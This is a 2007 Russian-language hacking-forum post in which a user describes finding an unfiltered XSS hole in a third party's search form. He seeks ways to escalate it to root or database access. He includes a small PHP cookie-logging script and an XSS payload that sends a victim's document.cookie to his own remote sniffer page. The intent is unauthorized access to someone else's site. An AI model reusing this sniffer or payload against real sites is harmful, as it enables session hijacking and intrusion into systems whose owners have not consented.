ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

xss. - другие варианты использования...
  #1  
Старый 14.02.2007, 01:35
Аватар для Lizardman
Lizardman
Познающий
Регистрация: 05.02.2007
Сообщений: 78
Провел на форуме:
1579039

Репутация: 109
Отправить сообщение для Lizardman с помощью ICQ
По умолчанию xss. - другие варианты использования...

День добрый.

Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит.
Это форма поиска, движок самописный, на полноценном хосте.
Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте.

Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются.

Пробовал также сделать собственный сниффер.
Код:
<?php>  $query = $_SERVER['QUERY_STRING'];  
$query .= "\n"; 
$db="cookies.txt"; 
$fh=fopen ($db, "a+"); 
fputs ($fh, "$query"); 
?>
Вставлял ссылку
http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script>
Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб.

Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки.
Буду признателен за помошь.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss черви и вирусы: сообщества уязвимых Utochka Чужие Статьи 3 28.08.2006 00:26
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ